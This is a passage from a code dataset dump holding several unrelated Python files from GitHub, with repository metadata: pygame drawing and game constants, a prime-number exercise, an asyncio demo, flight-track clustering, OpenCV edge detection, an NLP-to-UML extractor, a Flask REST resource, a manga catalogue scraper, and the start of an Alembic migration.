r0, (5 * r0) // 2, r0 // 5], 0)\n\n # eyes\n circle(surface, BLACK, (x + 5 * r, y + r0), r0 // 5, 0)\n circle(surface, BLACK, (x + 3 * r + r // 2, y + r0), r0 // 5, 0)\n\n draw_ear(surface, x + r, y + (3 * r0) // 5, (3 * r) // 5)\n\n\ndef draw_bear(surface, x, y, r):\n # in case r is negative:\n s = (1 - r // abs(r)) // 2\n r0 = abs(r)\n\n draw_head(surface, x + 3 * r, y - 2 * r0, r)\n\n # body\n ellipse(surface, WHITE, [x + 8 * r * s, y, 8 * r0, 16 * r0], 0)\n ellipse(surface, BLACK, [x + 8 * r * s, y, 8 * r0, 16 * r0], 1)\n\n draw_hole(surface, x + 19 * r, y + 12 * r0, 2 * r)\n\n # fishing rod\n line(surface, BLACK, (x + 8 * r + r // 2, y + 7 * r0), (x + 18 * r + r // 2, y - 3 * r0), 5)\n line(surface, BLACK, (x + 18 * r, y - 3 * r0 + r0 // 2), (x + 18 * r, y + 12 * r0), 1)\n\n # hand\n ellipse(surface, WHITE, [x + 6 * r + 5 * r * s, y + 4 * r0, 5 * r0, 2 * r0], 0)\n ellipse(surface, BLACK, [x + 6 * r + 5 * r * s, y + 4 * r0, 5 * r0, 2 * r0], 1)\n\n # leg\n ellipse(surface, WHITE, [x + 4 * r + 6 * r * s, y + 12 * r0, 6 * r0, 4 * r0], 0)\n ellipse(surface, BLACK, [x + 4 * r + 6 * r * s, y + 12 * r0, 6 * r0, 4 * r0], 1)\n ellipse(surface, WHITE, [x + 8 * r + r // 2 + 3 * r * s, y + 14 * r0, 3 * r0, 2 * r0], 0)\n ellipse(surface, BLACK, [x + 8 * r + r // 2 + 3 * r * s, y + 14 * r0, 3 * r0, 2 * r0], 1)\n\n\npygame.init()\n\nFPS = 30\nscreen = pygame.display.set_mode((700, 900))\n\n# background\nrect(screen, SKY, (0, 0, 700, 450))\nrect(screen, WHITE, (0, 450, 700, 450))\nline(screen, BLACK, (0, 450), (700, 450), 1)\n\ndraw_sun(500, 200, 190)\n\nbear = screen.subsurface([0, 0, 700, 900])\npositions = [[20, 450, 10], [100, 730, 15], [650, 550, -10]]\nfor pos in positions:\n draw_bear(bear, pos[0], pos[1], pos[2])\n\npygame.display.update()\nclock = pygame.time.Clock()\nfinished = False\n\nwhile not finished:\n clock.tick(FPS)\n pygame.display.update()\n for event in pygame.event.get():\n if (event.type == pygame.QUIT) or (pygame.time.get_ticks() > 5000):\n finished = True\n\npygame.quit()","repo_name":"GrishkaYesenin/infa_2021_esenia","sub_path":"lab5/my_cool_dogs.py","file_name":"my_cool_dogs.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"3036259591","text":"import sys\n\ninput = sys.stdin.readline\n\nM, N = map(int, input().split())\n\ndef is_prime_num(num):\n if num == 1:\n return False\n \n for i in range(2, int(num**0.5)+1):\n if num % i == 0:\n return False\n \n return True\n \n \nfor num in range(M, N+1):\n if is_prime_num(num):\n print(num)","repo_name":"MOONisYOUNG/Algorithms_Study","sub_path":"BOJ/no_1929_Prime_Number.py","file_name":"no_1929_Prime_Number.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"13398833609","text":"#PROCESSING RANDOM TASKS\r\nimport asyncio\r\nimport time\r\nasync def Task_ex(n):\r\n time.sleep(1)\r\n print(\"Processing {}\".format(n))\r\nasync def Generator_task():\r\n for i in range(10):\r\n asyncio.ensure_future(Task_ex(i))\r\n int(\"Tasks Completed\")\r\n asyncio.sleep(2)\r\n\r\nloop = asyncio.get_event_loop()\r\nloop.run_until_complete(Generator_task())\r\nloop.close()\r\n#CODE BY AYUSH SAXENA","repo_name":"ayush-29byte/APP-LAB-SOLUTIONS","sub_path":"event driven 4.py","file_name":"event driven 4.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"19600066394","text":"import ast\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom clustering import lat2y, lon2x\nfrom nl_airspace_def import ehaa_airspace\nfrom timesnapshots import cut_interval\n\nif __name__ == \"__main__\":\n data_date = '20180101'\n clusters_to_analyse = [48, 51]\n n_data_points = 200\n with open('data/clustered/eham_{0}.csv'.format(data_date), 'r') as fp:\n parameters = ast.literal_eval(fp.readline())\n df_all = pd.read_csv(fp)\n df_all.sort_values(by=['cluster', 'ts'], inplace=True)\n airspace_query = \"airport=='{}'\".format(\"EHAM\")\n airspace = ehaa_airspace.query(airspace_query)\n\n airspace_x = lon2x(airspace[airspace['type'] == 'CTR'].geometry.centroid.x).iloc[0]\n airspace_y = lat2y(airspace[airspace['type'] == 'CTR'].geometry.centroid.y).iloc[0]\n df_all['x'] = lon2x(df_all['lon'].values) - airspace_x\n df_all['y'] = lat2y(df_all['lat'].values) - airspace_y\n df_all['dist_to_airport'] = np.sqrt((df_all['x']) ** 2 + (df_all['y']) ** 2) / 1852\n df_all['FL'] = df_all['alt']/100\n df_all['trk_rad'] = np.deg2rad(df_all['trk'])\n for cluster_n in clusters_to_analyse:\n df = df_all.query('cluster==@cluster_n')\n # df_by_interval = cut_interval(df, 3600).reset_index().set_index(['interval', 'fid', 'ts'])\n # fid_per_interval = df_by_interval.groupby(by='interval')['fid'].unique().apply(len)\n tracks_in_cluster = len(df['fid'].unique())\n print(\"Analysing cluster(s) {0} (n_tracks={1})\".format(cluster_n, tracks_in_cluster))\n fid_start_stop_times = []\n for fid, track_points in df.groupby('fid'):\n fid_start_stop_times.append([fid, track_points['ts'].min(), track_points['ts'].max()])\n assert len(track_points) >= n_data_points\n resampling_indices = np.round(np.linspace(0, len(track_points) - 1, n_data_points)).astype('int')\n df.loc[track_points.index[resampling_indices], 'index_along_track'] = list(range(n_data_points))\n # Stupid SettingWithCopyWarning\n assert np.all(df.loc[track_points.index[resampling_indices], 'index_along_track'] >= 0)\n df_start_stop_times = pd.DataFrame.from_records(fid_start_stop_times, columns=['fid', 't0', 'tend'])\n df_start_stop_times['duration'] = df_start_stop_times['tend'] - df_start_stop_times['t0']\n\n break\n #\n # df_downsampled = df.query('index_along_track >= 0')\n # points_along_track = df_downsampled.groupby('index_along_track')\n # fields = ['x', 'y', 'alt', 'gs']\n # df_along_track = points_along_track.mean()[fields].merge(points_along_track[fields].quantile(q=0.0), suffixes=['', '_l'], right_index=True, left_index=True)\n # df_along_track = df_along_track.merge(points_along_track[fields].quantile(q=1), suffixes=['', '_u'], right_index=True, left_index=True)\n #\n # plt.figure()\n # ax = df_along_track.plot(x='x', y='y')\n # ax.fill_between(df_along_track['x_l'], df_along_track['y_l'], df_along_track['y_u'], alpha=0.5, step='mid', color='C0')\n # ax.fill_between(df_along_track['x_u'], df_along_track['y_l'], df_along_track['y_u'], alpha=0.5, step='mid', color='C0')\n # ax.fill_betweenx(df_along_track['y_l'], df_along_track['x_l'], df_along_track['x_u'], alpha=0.5, step='mid', color='C0')\n # ax.fill_betweenx(df_along_track['y_u'], df_along_track['x_l'], df_along_track['x_u'], alpha=0.5, step='mid', color='C0')\n # plt.legend(['mean', 'total area'])\n # plt.show()\n #\n # plt.figure()\n # ax = df_along_track.plot(y='alt',color='C3')\n # ax.fill_between(df_along_track.index, df_along_track['alt_l'], df_along_track['alt_u'])\n # plt.show()\n #\n # plt.figure()\n # ax = df_along_track.plot(y='gs',color='C3')\n # ax.fill_between(df_along_track.index, df_along_track['gs_l'], df_along_track['gs_u'])\n # plt.show()\n #\n","repo_name":"salomonsters/thesis","sub_path":"camda.py","file_name":"camda.py","file_ext":"py","file_size_in_byte":3958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16061158984","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom util.image_utils import show_image, merge_images\nfrom util.image_utils import def_image\nfrom util.image_utils import canny_edge_threshold\nfrom util.image_utils import show_image_matrix\n\n\ndef main():\n\n cherry = def_image('../data/cherry.jpg')\n apple = def_image('../data/red_apple.jpg')\n image_gray_cherry = cv2.cvtColor(cherry, cv2.COLOR_BGR2GRAY)\n single_cherry_edges = canny_edge_threshold(image_gray_cherry, 100, 30)\n image_gray_apple = cv2.cvtColor(apple, cv2.COLOR_BGR2GRAY)\n single_apple_edges = canny_edge_threshold(image_gray_apple, 100, 50)\n images = [cherry, single_cherry_edges, apple, single_apple_edges]\n show_image_matrix(2, images)\n new_image = merge_images(cherry, apple)\n hole_image_edges = canny_edge_threshold(new_image, 100, 50)\n apple_part = new_image[0:800, 1300:2200]\n cherry_part = new_image[0:800, 0:1050]\n apple_gray = cv2.cvtColor(apple_part, cv2.COLOR_BGR2GRAY)\n apple_edges = canny_edge_threshold(apple_gray, 100, 50)\n apple_edge_number = np.count_nonzero(apple_edges)\n print(\"Number of edges in apple = \", apple_edge_number)\n cherry_gray = cv2.cvtColor(cherry_part, cv2.COLOR_BGR2GRAY)\n cherry_edges = canny_edge_threshold(cherry_gray, 100, 50)\n cherry_edge_number = np.count_nonzero(cherry_edges)\n print(\"Number of edges in cherry = \", cherry_edge_number)\n images = (new_image, hole_image_edges, apple_edges, cherry_edges)\n show_image_matrix(2,images)\n print(\"Upper threshold value = 100\")\n print(\"Lower threshold value = 50\")\n\n if cherry_edge_number > apple_edge_number:\n show_image(cherry_part, \"The fruit is cherry\")\n show_image(apple_part, \"The fruit is apple\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mertozgumuss/GOHM_Internship","sub_path":"src/edge_detection_week2.py","file_name":"edge_detection_week2.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40095316183","text":"import subprocess\nfrom stanfordcorenlp import StanfordCoreNLP\nimport logging\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tree import Tree\nfrom nltk import stem\n\n# word lists\nstop_words = [\n 'i',\n 'me',\n 'my',\n 'myself',\n 'we',\n 'our',\n 'ours',\n 'ourselves',\n 'you',\n 'your',\n 'yours',\n 'yourself',\n 'yourselves',\n 'he',\n 'him',\n 'his',\n 'himself',\n 'she',\n 'her',\n 'hers',\n 'herself',\n 'it',\n 'its',\n 'itself',\n 'themselves',\n 'what',\n 'who',\n 'whom',\n 'this',\n 'these',\n 'those',\n 'examples',\n 'but',\n 'because',\n 'until',\n 'while',\n 'at',\n 'about',\n 'between',\n 'if',\n 'with',\n 'through',\n 'during',\n 'after',\n 'above',\n 'below',\n 'up',\n 'down',\n 'able',\n 'form',\n 'of',\n 'off',\n 'over',\n 'under',\n 'again',\n 'further',\n 'then',\n 'once',\n 'here',\n 'there',\n 'where',\n 'why',\n 'how',\n 'all',\n 'both',\n 'each',\n 'few',\n 'most',\n 'other',\n 'some',\n 'no',\n 'nor',\n 'not',\n 'only',\n 'own',\n 'same',\n 'than',\n 'too',\n 'very',\n 's',\n 't',\n 'just',\n 'don',\n \"don't\",\n 'should',\n 'now',\n 'd',\n 'll',\n 'm',\n 'o',\n 're',\n 've',\n 'y',\n 'ain',\n 'aren',\n \"aren't\",\n 'couldn',\n 'didn',\n 'doesn',\n \"doesn't\",\n 'hadn',\n 'hasn',\n 'haven',\n 'isn',\n 'ma',\n 'mightn',\n 'mustn',\n 'needn',\n 'shan',\n 'shouldn',\n 'wasn',\n \"wasn t\",\n 'weren',\n 'weren t',\n 'won',\n 'won t',\n 'wouldn',\n 'wouldn t',\n 'multiple',\n 'many',\n 'forward',\n 'etc',\n 'shall',\n 'also',\n 'therefore',\n 'might',\n 'able',\n 'various',\n 'necessary',\n 'several',\n 'usually',\n 'must',\n 'finally',\n 'different',\n 'firstly',\n 'corresponding',\n 'enough',\n 'relevant',\n '’s',\n 'furthermore',\n 'desired',\n 'typically',\n 'initially',\n 'additional',\n]\n\nsto_words_further = [\n 'their',\n 'such',\n 'as',\n 'them',\n 'will',\n 'that',\n 'when',\n 'they',\n 'for',\n 'may',\n 'types',\n 'specific',\n 'particular',\n]\n\n\ncomposition_word = [\n 'have',\n 'has',\n 'contains',\n 'contain',\n 'contained',\n 'composed of',\n 'maintain',\n 'maintains',\n 'maintained',\n 'consists of',\n 'hold',\n 'holds',\n 'held',\n 'include',\n 'includes',\n 'included',\n 'divided to',\n 'has part',\n 'comprise',\n 'carry',\n 'involve',\n 'imply',\n 'embrace',\n 'is for',\n 'consist',\n 'consists',\n]\n\n# subtyping_word = ['is a', 'is a kind of', 'are', 'are classified as', 'can be', 'is classified as']\n\nsubtyping_word = ['is a', 'is a kind of', 'is', 'can be', 'are', 'can involve', 'be']\n\ndesign_elements = ['system', 'user', 'application', 'data', 'computer', 'object', 'information', 'interface', 'online']\n\nattribute_words = [\n 'id',\n 'first name',\n 'last name',\n 'name',\n 'address',\n 'email',\n 'number',\n 'no',\n 'code',\n 'date',\n 'type',\n 'volume',\n 'birth',\n 'password',\n 'price',\n 'quantity',\n 'location',\n 'maximum temperature',\n 'resolution date',\n 'creation date',\n 'crime code',\n 'course name',\n 'time slot',\n 'quantities',\n 'delivery date',\n 'prices',\n 'delivery address',\n 'scanner',\n 'till',\n 'illness conditions',\n 'diagnostic result',\n 'suggestions',\n 'birth date',\n 'order number',\n 'total cost',\n 'entry date',\n 'delivery status',\n 'description',\n 'product number',\n]\n\n# settings\nclass SubStanfordCoreNLP(StanfordCoreNLP):\n def __init__(self, path_or_host, port=None, memory='4g', lang='en', quiet=True, logging_level=logging.WARNING):\n super(SubStanfordCoreNLP, self).__init__(path_or_host, port, memory, lang, quiet, logging_level)\n\n def open_ie(self, sentence):\n r_dict = self._request('openie', sentence)\n openies = [(ie['subject'], ie['relation'], ie['object']) for s in r_dict['sentences'] for ie in s['openie']]\n return openies\n\n\nnlp = SubStanfordCoreNLP('https://corenlp.semax.nguml.com', port=443)\n\nlemmatizer = stem.WordNetLemmatizer()\n\n\n# check attribute and return in dic or lst\ndef check_attr(s):\n \"\"\"Check if subject or object belongs to attribute and act accordingly.\n\n Args:\n - s (tuple): [0]: subject, [1]: relation, [2]: object\n \"\"\"\n cls = {'Class': set(), 'Attribute': []}\n # check if object belongs to attribute and subject doesn't belong to attribute\n if s[0] in attribute_words and s[0] not in cls['Attribute']:\n cls['Attribute'].append(s[0])\n c = lemmatizer.lemmatize(s[2], pos='n').capitalize()\n cls['Class'] = c\n return cls\n\n # check if subject belongs to attribute and object belongs to class\n elif s[2] in attribute_words and s[2] not in cls['Attribute']:\n cls['Attribute'].append(s[2])\n c = lemmatizer.lemmatize(s[0], pos='n').capitalize()\n cls['Class'] = c\n return cls\n else:\n # Both are not a attribute so return two classes\n c1 = lemmatizer.lemmatize(s[0], pos='n').capitalize()\n c2 = lemmatizer.lemmatize(s[2], pos='n').capitalize()\n return [{'Class': c1, 'Attribute': []}, {'Class': c2, 'Attribute': []}]\n\n\n# direction extract\ndef get_dir2(s):\n \"\"\"Get direction for relations.\"\"\"\n dir = {'from': set(), 'to': set()}\n raw_cls = [s[0], s[2]]\n raw_dir = []\n\n if s[0] in attribute_words or s[2] in attribute_words:\n raw_cls.clear()\n return None\n else:\n for words in raw_cls:\n words = words.split(' ')\n a = []\n for w in words:\n neww = lemmatizer.lemmatize(w, pos='n').capitalize()\n a.append(neww)\n b = ''.join(a)\n raw_dir.append(b)\n\n # using dependency parser to check and define direction between classes\n tri = list(s)\n joint_s = ' '.join(tri)\n dep = nlp.dependency_parse(joint_s)\n\n firstelement = []\n for d in dep:\n if d[0] not in firstelement:\n firstelement.append(d[0])\n\n if raw_dir[0] != raw_dir[1]:\n if 'nsubj' in firstelement:\n dir['from'] = raw_dir[0]\n dir['to'] = raw_dir[1]\n elif 'nsubjpass' in firstelement:\n dir['from'] = raw_dir[1]\n dir['to'] = raw_dir[0]\n else:\n dir['from'] = raw_dir[0]\n dir['to'] = raw_dir[1]\n\n return dir\n\n else:\n return None\n\n\n# relationship extraction\ndef get_rels2(s):\n \"\"\"Define the relations for sentences.\n\n Args:\n - s (string): sentence with relations.\n \"\"\"\n rel = {}\n # using dependecny parser to check active and passive voice\n tri = list(s)\n joint_s = ' '.join(tri)\n dep = nlp.dependency_parse(joint_s)\n\n firstelement = []\n for d in dep:\n if d[0] not in firstelement:\n firstelement.append(d[0])\n\n convertrel = []\n if 'nsubjpass' in firstelement:\n pos = nlp.pos_tag(s[1])\n for p in pos:\n if p[1] == 'VBN':\n convertrel.append(p[0])\n # using lemmatizer to transfer passive verb to active\n relname = lemmatizer.lemmatize(convertrel[0], pos='v')\n if relname in composition_word:\n rel['Composition'] = relname\n elif relname in subtyping_word:\n rel['Subtyping'] = ''\n else:\n rel['Association'] = relname\n\n else:\n if s[1] in composition_word:\n rel['Composition'] = s[1]\n elif s[1] in subtyping_word:\n rel['Subtyping'] = ''\n else:\n rel['Association'] = s[1]\n return rel\n\n\n# multiplicity extraction\ndef get_multi():\n # set default multiplicity results as the widest range '*'\n multi = {'multiplicity': ['*', '*']}\n return multi\n\n\n# subtyping multiplicity\ndef get_multi2():\n multi = {'multiplicity': ['', '']}\n return multi\n\n\n# composition multiplicity\ndef get_multi3():\n multi = {'multiplicity': ['1', '*']}\n return multi\n\n\n# check if object belongs to VBN\ndef obj_obj(s):\n \"\"\"Check object of sentence.\n\n Remove the object if it is a verb past participle (VBN)\n\n Args:\n s (arr[str]): with subject, action and object of the sentence\n\n Returns:\n update (arr[str]): subject, action and if it exists an object.\n \"\"\"\n new = []\n update = []\n lst = [s[0], s[1]]\n obj = nlp.pos_tag(s[2])\n\n # print(obj)\n for i in obj:\n if i[1] != 'VBN':\n new.append(i[0])\n word = ' '.join(new)\n if word != '':\n lst.append(word)\n update = lst\n return update\n\n\n# if openie fails\ndef get_triple(s):\n tri_lst = []\n try:\n np = s[0]\n vp = s[1]\n\n qnp = [np]\n while qnp:\n nps = qnp.pop(0)\n for ns in nps:\n if ns.label() == 'NP':\n qnp.append(ns)\n elif ns.label() in ['NN', 'NNS', 'NNP']:\n tri_lst.append(ns.leaves()[0])\n qvp = [vp]\n while qvp:\n vbs = qvp.pop(0)\n for vs in vbs:\n if vs.label() in ['VP', 'NP', 'PP']:\n qvp.append(vs)\n elif vs.label() in ['VB', 'VBN', 'VBZ']:\n tri_lst.append(vs.leaves()[0])\n elif vs.label() in ['NN', 'NNS', 'NNP']:\n tri_lst.append(vs.leaves()[0])\n except Exception as _:\n print(s)\n triple = tuple(tri_lst)\n return triple\n\n\n# Read file\n# lowercase, and concatenating paragraphs\ndef get_lines(file_path):\n \"\"\"Retrieve lines from file.\n\n Reads the file and lowercases everything and concatenates the different paragraphs.\n\n Args:\n file_path (str): path to the file with text.\n\n Returns:\n str: Containing all the text.\n \"\"\"\n with open(file_path, 'r') as f:\n raw_data = f.read().lower()\n lines = raw_data.split('\\n')\n filtered_lines = [s for s in lines if s != '']\n initial_text = ' '.join(filtered_lines)\n # print(initial_text)\n return initial_text\n\n\ndef remove_design_elements(sent):\n \"\"\"Remove design elements from the sentence.\"\"\"\n tokens = nlp.word_tokenize(sent)\n # print(tokens)\n filtered_tokens = [token for token in tokens if token not in design_elements]\n line = ' '.join(filtered_tokens)\n return line\n\n\ndef remove_stopwords(line):\n \"\"\"Remove stopwords for openie.\"\"\"\n word = nlp.word_tokenize(line)\n filtered_stop = [w for w in word if w not in stop_words]\n ie_sent = ' '.join(filtered_stop)\n # print(ie_sent)\n return ie_sent\n\n\ndef remove_other_stopwords(item):\n \"\"\"Remove other stopwords from openie item.\"\"\"\n new_item = []\n for word in item:\n filtered_word = nlp.word_tokenize(word)\n update_word = [i for i in filtered_word if i not in sto_words_further]\n\n update_tri = ' '.join(update_word)\n new_item.append(update_tri)\n return new_item\n\n\n# text pre-processing\ndef preprocessing(text):\n \"\"\"Preprocess the input text.\n\n Remove stopwords, design elements and more stopwords\n Args:\n text (str): requirements.\n\n Returns:\n standard_txt (str): text removed from the stop words and design elements.\n \"\"\"\n standard_txt = []\n initial_text = text\n sents = sent_tokenize(initial_text)\n\n # preprocessing sentence by sentence\n for s in sents:\n line = remove_design_elements(s)\n ie_sent = remove_stopwords(line)\n ies = nlp.open_ie(ie_sent)\n # print(ies)\n process_ies = []\n for item in ies:\n new_item = remove_other_stopwords(item)\n\n if '' not in new_item:\n #\n new = obj_obj(new_item)\n if len(new) != 0:\n new1 = tuple(new)\n process_ies.append(new1)\n\n # print(process_ies)\n\n # if openie fails\n if len(ies) == 0:\n parser = nlp.parse(ie_sent)\n tree = Tree.fromstring(parser)\n root = tree[0]\n triple = get_triple(root)\n standard_txt.append(triple)\n else:\n for eachies in process_ies:\n if eachies not in standard_txt:\n standard_txt.append(eachies)\n\n return standard_txt\n\n\n# add\ndef generate_uml(text):\n \"\"\"\n\n Args:\n text (str): Filepath of the requirements text file\n \"\"\"\n data = preprocessing(text)\n objectDict = {}\n sum = []\n clsoutput = ''\n sumoutput = ''\n subtypes = {}\n\n for s in data:\n check = check_attr(s)\n # s looks like it is an open ie\n\n if isinstance(check, dict):\n raw_cls = [check['Class']]\n raw_dir = []\n for words in raw_cls:\n # get lemmatization of each word in class\n words = words.split(' ')\n a = []\n for w in words:\n neww = lemmatizer.lemmatize(w, pos='n').capitalize()\n a.append(neww)\n b = ''.join(a)\n raw_dir.append(b)\n # 不在,存入\n if raw_dir[0] not in objectDict:\n id = raw_dir[0]\n objectDict[id] = {}\n objectDict[id]['Class'] = raw_dir[0]\n objectDict[id]['Attribute'] = check['Attribute']\n # 在\n else:\n if raw_dir[0] not in objectDict[raw_dir[0]]['Attribute']:\n # objectDict[check['Class']]['Attribute'].append(check['Atrribute'][0])\n objectDict[raw_dir[0]]['Attribute'].extend(check['Attribute'])\n else:\n\n for item in check:\n raw_cls = [item['Class']]\n raw_dir = []\n for words in raw_cls:\n words = words.split(' ')\n a = []\n for w in words:\n neww = lemmatizer.lemmatize(w, pos='n').capitalize()\n a.append(neww)\n b = ''.join(a)\n raw_dir.append(b)\n # print(raw_dir)\n # 不在\n if raw_dir[0] not in objectDict:\n id = raw_dir[0]\n objectDict[id] = {}\n objectDict[id]['Class'] = raw_dir[0]\n objectDict[id]['Attribute'] = []\n\n e = get_dir2(s)\n dir2 = e\n\n if dir2 is not None:\n r = get_rels2(s)\n rels2 = r\n keys = list(rels2)\n if keys[0] == 'Subtyping':\n m = get_multi2()\n multi2 = m\n subtypes[str(dir2['from'])] = dir2['to']\n elif keys[0] == 'Composition':\n m = get_multi3()\n multi2 = m\n else:\n m = get_multi()\n multi2 = m\n sum.append(list(rels2.items()) + list(dir2.items()) + list(multi2.items()))\n\n # format to display in textarea\n for item in objectDict.items():\n a = 'Class: ' + item[0] + '\\n'\n a += ' Attribute: ' + str(item[1]['Attribute'])\n clsoutput += a + '\\n'\n\n for s in sum:\n r = '\\n' + '\\n' + '{}: {}'.format(s[0][0], s[0][1])\n d1 = '\\n' + '{}: {}'.format(s[1][0], s[1][1])\n m1 = '\\n' + ' {}: {}'.format(s[3][0], s[3][1][0])\n d2 = '\\n' + '{}: {}'.format(s[2][0], s[2][1])\n m2 = '\\n' + ' {}: {}'.format(s[3][0], s[3][1][1])\n sumoutput += r + d1 + m1 + d2 + m2\n\n output = clsoutput + sumoutput\n return objectDict, sum, subtypes, output\n","repo_name":"yhu02/LIACS","sub_path":"year3/SWE/ngUML.component.backend/nguml/classes/nlp/corenlp.py","file_name":"corenlp.py","file_ext":"py","file_size_in_byte":15761,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"9888031121","text":"import pygame\r\n\r\n# constants\r\nSCREEN_WIDTH = 800\r\nSCREEN_HEIGHT = 600\r\nGAME_FPS = 60\r\nGAME_CLOCK = pygame.time.Clock()\r\nBACKGROUND_COLOR = (0, 0, 50)\r\nBACKGROUND_IMG_LOC = \"media/background.png\"\r\nBACKGROUND_IMG = pygame.image.load(BACKGROUND_IMG_LOC)\r\nBACKGROUND_MUSIC_LOC = \"media/background.wav\"\r\n\r\nGAME_CAPTION = \"Space Invaders\"\r\nGAME_ICON = \"media/game_icon.png\"\r\n\r\nPLAYER_IMAGE_LOC = \"media/player.png\"\r\nPLAYER_IMG = pygame.image.load(PLAYER_IMAGE_LOC)\r\nPLAYER_IMG_WIDTH = PLAYER_IMG.get_width()\r\nPLAYER_IMG_HEIGHT = PLAYER_IMG.get_height()\r\nPLAYER_X_INIT = (SCREEN_WIDTH / 2) - (PLAYER_IMG_WIDTH / 2) # half on screen x-axis\r\nPLAYER_Y_INIT = (SCREEN_HEIGHT * .8) + (PLAYER_IMG_HEIGHT / 2) # 3/4 down on screen y-axis\r\nPLAYER_VELOCITY = 4 # pixels per tick\r\nPLAYER_BULLET_INTERVAL = 300 # milliseconds between firing a bullet\r\n\r\nENEMY_IMG_LOC = \"media/alien.png\"\r\nENEMY_DEATH_SOUND_LOC = \"media/explosion.wav\"\r\nENEMY_IMG = pygame.image.load(ENEMY_IMG_LOC)\r\nENEMY_IMG_WIDTH = ENEMY_IMG.get_width()\r\nENEMY_IMG_HEIGHT = ENEMY_IMG.get_height()\r\nENEMY_X_VELOCITY = 1.25 # pixels per tick\r\nENEMY_Y_VELOCITY = .2 # pixels per tick\r\n\r\nBULLET_IMG_LOC = \"media/bullet.png\"\r\nBULLET_FIRE_SOUND_LOC = \"media/laser.wav\"\r\nBULLET_IMG = pygame.image.load(BULLET_IMG_LOC)\r\nBULLET_IMG_WIDTH = BULLET_IMG.get_width()\r\nBULLET_IMG_HEIGHT = BULLET_IMG.get_height()\r\nBULLET_VELOCITY = 6\r\n\r\nSCORE_FONT_SIZE = int(SCREEN_WIDTH * .05)\r\nSCORE_FONT_COLOR = (255, 255, 255)\r\n# SCORE_FONT = pygame.font.Font('freesansbold.ttf', SCORE_FONT_SIZE)\r\nSCORE_TEXT_POS = (int(SCREEN_WIDTH * .0125), int(SCREEN_HEIGHT * .0125))\r\n\r\nimport point\r\nimport random\r\nimport enemy\r\nimport bullet\r\nimport player\r\nfrom pygame import mixer\r\n","repo_name":"abhishekir/SpaceInvaders","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43376322636","text":"from db import db\n\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\n\nfrom model.products import Snaps\n\nclass VersionId(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument('current',\n type=dict,\n required=True,\n help=\"This filed cannot be left blank!\"\n )\n\n def get(self, name):\n products = Snaps()\n product = products.query.filter_by(version_id=name).first()\n result = {}\n if product:\n for item in product.dp:\n result[item.version_id] = [item.version, item.product_id]\n return result, 200\n return {'message': \"No item to GET.\"}, 404\n\n @jwt_required() #must autheticate before calling GET\n def post(self, name):\n # import pdb; pdb.set_trace()\n products = Snaps()\n product = products.query.filter_by(version_id=name).first()\n if product:\n return {'message': \"An item with id '{}' already exists.\".format(name)}, 400 # bad request\n\n data = VersionId.parser.parse_args()\n Snaps.add_data(data, name)\n return {'message': \"Item successfuly POSTed\"}, 201\n\n # except:\n # return {\"message\": \"An error occured inserting the item.\"}, 500 #Internal Server Error\n\n @jwt_required() #must autheticate before calling GET\n def delete(self, name):\n result = Snaps.remove_data(name)\n if result:\n return {'message': 'Item DELETED'}\n return {'message': 'Noting was deleted'}\n\n @jwt_required() #must autheticate before calling GET\n def put(self, name): # must be idempotent\n Snaps.remove_data(name)\n data = VersionId.parser.parse_args()\n Snaps.add_data(data, name)\n return {'message': \"PUT action was successfuly.\"}, 201\n\n\nclass ProductList(Resource):\n\n def get(self):\n products = Snaps()\n return {item.version_id: str(item.date_added) for item in products.query.all()}\n","repo_name":"uchenna-j-edeh/genericAPI","sub_path":"resources/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4949678106","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nurl = 'https://www.dmzj.com/info/yaoshenji.html'\n\n\ndef getCatalogueAndLink(url):\n chapter = []\n chapterLink = []\n\n # step1: get html\n html = requests.get(url)\n\n # step2: parse\n soup = BeautifulSoup(html.text, 'lxml')\n title = soup.find_all('h1')[0].text\n ulList = soup.find_all('ul', class_='list_con_li autoHeight')\n soup = BeautifulSoup(str(ulList[1]), 'lxml')\n a_labelList = soup.find_all('a')\n for item in a_labelList:\n chapter.append(item.get('title'))\n chapterLink.append(item.get('href'))\n return title, chapter, chapterLink\n\n\ndef main():\n title, chapter, chapterLink = getCatalogueAndLink(url)\n # verification\n with open('%s.html' % title, 'w') as file:\n for i in range(len(chapter)):\n file.write(str(chapter[i])+' --> '+str(chapterLink[i])+'\\n')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yiyah/spider","sub_path":"learn/image/dmzj/2_getCatalogue.py","file_name":"2_getCatalogue.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39929940368","text":"\"\"\"QQ\n\nRevision ID: 29d15d666661\nRevises: \nCreate Date: 2019-11-02 00:15:38.296658\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '29d15d666661'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('allineamenti',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('allineamento', sa.String(length=100), 